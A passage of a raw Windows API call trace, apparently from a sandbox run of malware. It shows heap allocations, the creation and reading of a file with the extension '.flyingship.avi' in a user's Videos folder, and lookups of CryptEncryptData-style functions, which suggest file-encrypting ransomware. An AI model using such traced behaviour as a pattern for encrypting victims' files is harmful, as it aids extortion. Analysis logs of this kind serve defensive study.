| out: lpMsg=0x87f36c) returned 0 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0197.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100) returned 0x900378 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900378 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0197.649] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho")) returned 0x10 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0197.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\suitfltgqdh7fzsjoo.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0197.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0197.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0197.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0197.652] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0197.652] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xab3a, lpOverlapped=0x0) returned 1 [0197.655] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0197.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab3a) returned 0xbea018 [0197.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0197.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab3a) returned 0xbf4b60 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab3a) returned 0xbea018 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0197.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.657] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0197.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab3a) returned 0xbea018 [0197.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0197.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab3a) returned 0xbff6a8 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0197.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0197.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0197.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0197.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0197.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.661] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0197.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0197.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0197.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0197.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0197.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0197.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0197.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0197.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.663] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0197.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0197.663] RtlAllocateHeap 